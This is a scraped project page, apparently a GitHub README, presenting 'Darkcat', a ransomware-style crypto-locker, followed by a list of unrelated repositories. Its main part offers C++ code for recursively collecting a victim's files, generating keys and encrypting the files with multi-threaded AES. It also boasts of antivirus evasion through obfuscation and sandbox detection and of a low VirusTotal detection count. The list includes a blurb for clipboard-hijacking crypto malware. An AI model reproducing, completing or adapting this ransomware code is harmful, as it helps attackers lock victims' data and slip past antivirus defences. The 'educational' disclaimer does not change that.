DARKCAT Project - A Strong Prototype Crypto-Locker

DISCLAIMER: This tool is intended for educational purposes only. The author assumes no responsibility or liability for any damages caused by the execution of this algorithm, use at your own risk.

DARKCAT Project - A Strong Prototype Crypto-Locker

Darkcat is an Open Source Crypto-locker directed at an audience with an interest in the field of Cyber Security. The locker is similar to how very obnoxious Ransomwares operate using 2-Layer Key Encryption with the intent of making it almost impossible to recover any key from memory even during the event of Encryption. It utilizes Multi-threaded 128-bit AES Encryption which makes it very fast with the cost of leaving somewhat of a footprint on the CPU for modern activity based Antivirus Softwares to pick up. My Kaspersky didn't detect any suspicious activity in most runs, especially ones that didn't involve lots of files, with that being said the algorithm logs keys on the console but doesn't save any, so use at your own risk.

/*   -0-    ,    *     o    .     *    .    o    .  -O-   '  *  . o
 *  .  '     ____  ____  ____  _  __ ____  ____  _____  .  '  ,  *
 *     .  * /  _ \/  _ \/  __\/ |/ //   _\/  _ \/__ __\  *  . |  '
 *  *     . | | \|| / \||  \/||   / |  /  | / \|  / \  '  ,  o  '
 *  .  '    | |_/|| |-|||    /|   \ |  \_ | |-||  | | ' |   *   .
 *  '  *  . \____/\_/ \|\_/\_\\_|\_\\____/\_/ \|  \_/ *     .    o
 *  *    '  ,     '     .    -0-    .    *    .  ' |   ,   *    '
 * Alexander
 * Toepfer 2020
 */

Preview

Summary

  1. AV Evasion techniques used to bypass Engines.
  2. Fetching files recursively from a given root directory.
  3. Generation of 128-bit Keys used for Encryption.
  4. Multi-threaded Encryption applied on sorted vector of files.

AV Evasion techniques

The techniques used for AV Engine Evasion in Darkcat are Behaviour Obfuscation, Data Encryption and Sandbox Detection which make it fairly successful in dealing with most Engines that analyze the binary or execute it, but it is still far from perfect, as some elaborate AV Softwares using analysis based on Machine learning still detect malicious activity, which makes this implementation not FUD. In the following Code Snippets all of the above mentioned techniques will be left out, as otherwise the Source Code would be unreadable.

Fetching files from directory

    std::string path = "C:\\Path\\To\\Testfolder";
    /* First loop identifying files */
    std::vector< file > files;
    for( const auto& entry : std::filesystem::recursive_directory_iterator( path ) ) {
        if( std::filesystem::is_regular_file( entry.path() ) ) {
            /* Ignore any keyfiles in the directory */
            if( entry.path().filename() == keyfilestr )
                continue;
            /* Ignore certain files in certain modes */
            if( ( ( entry.path().extension() == fileExtension ) && encrypt ) ||
                ( ( entry.path().extension() != fileExtension ) && !encrypt ) )
                continue;
            file f( entry.path(), std::filesystem::file_size( entry.path() ) );
            /* Ignore files that are included already */
            if( std::find( files.begin(), files.end(), f ) != files.end() )
                continue;
            files.push_back( f );
        }
    }
    /* Sort by size with file.operator>() */
    std::sort( files.begin(), files.end() );

You could also do this with Boost instead of but it comes down to preference. You will also need to implement a file class for this implementation to work to store file information and for sorting, but that's not really a requirement, feel free to use an array of filesystem::path if that fits your needs.

128-bit Key Generation

std::string randomString( size_t length ) {
    /* Function returning the charset used */
    const auto chset = charset();
    std::default_random_engine rng( std::random_device{}() );
    /* Uniformly distributed values on closed interval */
    std::uniform_int_distribution<> dist( 0, chset.size() - 1 );
    /* Function returning a random character from charset */
    auto randchar = [ chset, &dist, &rng ]() { return chset[ dist( rng ) ]; };
    std::generate_n( str.begin(), length, randchar );
    return str;
}
std::string key1 = randomString( 16 ), key2 = randomString( 16 );

You could also use rand() with modulo here to just generate n-indices for your charset but i prefer this solution even though seeding the random generator is a complete nightmare and the standard makes no guarantees about its quality, efficiency or repeatability between implementations.

Multi-threaded Encryption

/* Second loop alter files */
std::vector< std::thread > threads;
for( const auto& f : files ) {
    if( encrypt ) {
	    std::thread t( fileEncrypt,  f.path, key, iv );
		threads.emplace_back( std::move( t ) );
	}
	else ...
}
/* Wait for processes to finish */
for( int i = 0; i < threads.size(); ++i ) {
    threads[ i ].join();
}

/* Crypto++ encryption of std::string */
std::string stringEncrypt( std::string plain,
                           CryptoPP::byte key[ CryptoPP::AES::DEFAULT_KEYLENGTH ],
                           CryptoPP::byte iv[ CryptoPP::AES::BLOCKSIZE ] ) {
    std::string cipher;
    CryptoPP::AES::Encryption aesEncryption( key, CryptoPP::AES::DEFAULT_KEYLENGTH );
    CryptoPP::CBC_Mode_ExternalCipher::Encryption cbcEncryption( aesEncryption, iv );
    CryptoPP::StreamTransformationFilter stfEncryptor( cbcEncryption,
					               new CryptoPP::StringSink( cipher ) );
    stfEncryptor.Put( reinterpret_cast< const unsigned char* >( plain.c_str() ),
		      plain.length() );
    stfEncryptor.MessageEnd();
    return cipher;
}

For AES-128 I didn't make my own implementation here because the solution needs to be somewhat fast and reliable, but I can see making an adaptation could help with more AV Evasion in the long run so it's very tempting.

Virustotal (4/70)

Preview

Copyright and license

Code and documentation copyright 2021 Alexander Töpfer. Code released under the MIT License

Owner
Alexander Töpfer
photo by unsplash.com/shooter1998
Alexander Töpfer
Similar Resources

crypted admin shell: SSH-like strong crypto remote admin shell for Linux, BSD, Android, Solaris and OSX

crypted admin shell: SSH-like strong crypto remote admin shell for Linux, BSD, Android, Solaris and OSX

crypted admin shell: SSH-like strong crypto remote admin shell for Linux, BSD, Android, Solaris and OSX

Aug 25, 2022

slock - simple screen locker

slock - simple screen locker simple screen locker utility for X. Requirements In order to build slock you need the Xlib header files. Installation Edi

Jan 5, 2022

Bosskey is an ultimate computer locker program for Linux & X11

Bosskey is an ultimate computer locker program for Linux & X11

Bosskey is an ultimate computer locker program for Linux & X11. Mute, pause, hide and lock at just a key press. It uses a modified version of suckless's slock to lock your computer; just type your password correctly and press enter.

May 30, 2022

functorch is a prototype of JAX-like composable function transforms for PyTorch.

functorch Why functorch? | Install guide | Transformations | Future Plans functorch is a prototype of JAX-like composable FUNCtion transforms for pyTO

Oct 3, 2022

Archer is the codename for our EPD laptop prototype with custom-made motherboard

Archer is the codename for our EPD laptop prototype with custom-made motherboard

Archer is the codename of our 1st EPD laptop prototype with custom-designed motherboard and 3D-printed chassis. Specifications The specification liste

Sep 7, 2022

functorch is a prototype of JAX-like composable function transforms for PyTorch.

functorch Why functorch? | Install guide | Transformations | Future Plans functorch is a prototype of JAX-like composable FUNCtion transforms for pyTO

Sep 23, 2022

What I'm doing here is insane GPU driver prototype for @GreenteaOS

What I'm doing here is insane GPU driver prototype for @GreenteaOS

NjRAA Work-in-progress Driver Foundation [nee-jee-ray] What I'm doing here is a GPU driver for Linux as a prototype for future graphics stack of the @

Jan 22, 2022

A small prototype for a Nano & Banano ATM. Payouts in physical euro coins, made with ESP32 and Lego bricks. Link to reddit post: https://www.reddit.com/r/nanocurrency/comments/pssu65/i_built_a_prototype_for_a_nano_banano_atm_payouts

ESP32 NANO & BANANO ATM A small prototype for a Nano & Banano ATM. Payouts in physical euro coins, made with ESP32 and Lego bricks. Link to reddit pos

Jan 19, 2022

A prototype of HCL MLIR dialect

An out-of-tree MLIR dialect This is an example of an out-of-tree MLIR dialect along with a hcl opt-like tool to operate on that dialect. Building This

Dec 11, 2021

A prototype, not playable but runnable

A prototype, not playable but runnable

Game developed by Dave Jornales, Masayuki Retuerma, Angelene Balais, Cleo Alcanzo, and Arsenic Salangsang Copyright (c) 2021 Dave Jornales (@AkagamiDe

Dec 10, 2021

functorch is a prototype of JAX-like composable function transforms for PyTorch.

functorch Why functorch? | Install guide | Transformations | Documentation | Future Plans This library is currently under heavy development - if you h

Oct 3, 2022

Playstation Vita first_loader hack for prototype units on firmware 1.03

broombroom Playstation Vita first_loader hack for prototype units on firmware 1.03 This hack grants "bootrom"-level code execution on the PSP2 by expl

Feb 27, 2022

Network utility tool which enables to prototype or test network things.

netsck netsck is a network utility tool which is developed to prototype or test network things. It provides a shell inside which runs javascript engin

May 29, 2022

Tensors and Dynamic neural networks in Python with strong GPU acceleration

Tensors and Dynamic neural networks in Python with strong GPU acceleration

PyTorch is a Python package that provides two high-level features: Tensor computation (like NumPy) with strong GPU acceleration Deep neural networks b

Sep 30, 2022

Simplified distributed block storage with strong consistency, like in Ceph (repository mirror)

Vitastor Читать на русском The Idea Make Software-Defined Block Storage Great Again. Vitastor is a small, simple and fast clustered block storage (sto

Sep 21, 2022

Gunyah is a Type-1 hypervisor designed for strong security, performance and modularity.

Gunyah is a Type-1 hypervisor designed for strong security, performance and modularity.

Gunyah is a Type-1 hypervisor, meaning that it is independent of any high-level OS kernel, and runs in a higher CPU privilege level. It does not depend on any lower-privileged OS kernel/code for its core functionality. This increases its security and can support a much smaller trusted computing base than a Type-2 hypervisor.

Oct 2, 2022

A minimalist andf platform-agnostic application layer for writing graphical applications, with a strong emphasis on simplicity and ease of use.

A minimalist andf platform-agnostic application layer for writing graphical applications, with a strong emphasis on simplicity and ease of use.

SlimApp A minimalist(*) and platform-agnostic application layer for writing graphical applications. Available as either a single header file or a dire

Sep 19, 2022

A minimalist library with basic facilities for developing interactive real-time 3D applications, with a strong emphasis on simplicity and ease of use.

A minimalist library with basic facilities for developing interactive real-time 3D applications, with a strong emphasis on simplicity and ease of use.

SlimEngine A minimalist and platform-agnostic base project for interactive graphical applications (2D/3D) with a strong emphasis on simplicity, ease o

Sep 19, 2022

Incremental backup with strong cryptographic confidentiality baked into the data model.

Incremental backup with strong cryptographic confidentiality baked into the data model.

Sep 22, 2022
A lightweight, secure, easy-to-use crypto library suitable for constrained environments.
A lightweight, secure, easy-to-use crypto library suitable for constrained environments.

The Hydrogen library is a small, easy-to-use, hard-to-misuse cryptographic library. Features: Consistent high-level API, inspired by libsodium. Instea

Sep 29, 2022
TLS/SSL and crypto library

Welcome to the OpenSSL Project OpenSSL is a robust, commercial-grade, full-featured Open Source Toolkit for the Transport Layer Security (TLS) protoco

Oct 2, 2022
A Powerful, Easy-to-Use, Compact, Cross-Platform and Installation-Free Crypto Tool. 一个强大,易用,小巧,跨平台且免安装的加密解密签名工具。
A Powerful, Easy-to-Use, Compact, Cross-Platform and Installation-Free Crypto Tool. 一个强大,易用,小巧,跨平台且免安装的加密解密签名工具。

GpgFrontend GpgFrontend is a Powerful, Easy-to-Use, Compact, Cross-Platform, and Installation-Free OpenPGP Crypto Tool. By using GpgFrontend, you can

Sep 26, 2022
The UAPKI is crypto library for using in PKI with support of Ukrainian and internationlal cryptographic standards.

UAPKI The UAPKI is crypto library for using in PKI with support of Ukrainian and internationlal cryptographic standards. Fork from Cryptonite. Expert

May 27, 2022
Malware that replaces copied crypto addresses with yours.
Malware that replaces copied crypto addresses with yours.

Crypto-Clipper Malware which replaces copied crypto addresses with yours. ?? Features Multiple cryptos supported (BTC, LTC, ETH, DOGE, DASH, NEO, BCH,

Sep 21, 2022
2020-1 KyungHee University information protection project
2020-1 KyungHee University information protection project

PGP Pretty Good Privacy의 약자로, 컴퓨터 파일을 암호화하고 복호화하는 프로그램입니다. Visual Studio 2019 기반으로 코드를 완성했고, PGP 동작 과정을 콘솔에 표현했습니다. PGP Transmission Mode의 Step 3 단계에서

Jun 10, 2022
Onix is a decentralized blockchain project built on Bitcoin's UTXO model

What is Onix? Onix is a decentralized blockchain project built on Bitcoin's UTXO model, with support for Ethereum Virtual Machine based smart contract

Dec 16, 2021
CS 244B project to use a public blockchain as a two-phase commit coordinator to securely commit an atomic transaction across any two systems of a database.

blockchain-2pc CS 244B project to use a public blockchain as a two-phase commit coordinator to securely commit an atomic transaction across any two sy

Jun 13, 2022
Strong type - C++ implementation of strong types

strong_type C++ implementation of strong types Build Status Linux (gcc-8, clang-8) / OSX Table of contents Table of contents What is this ? A tour of

Sep 27, 2022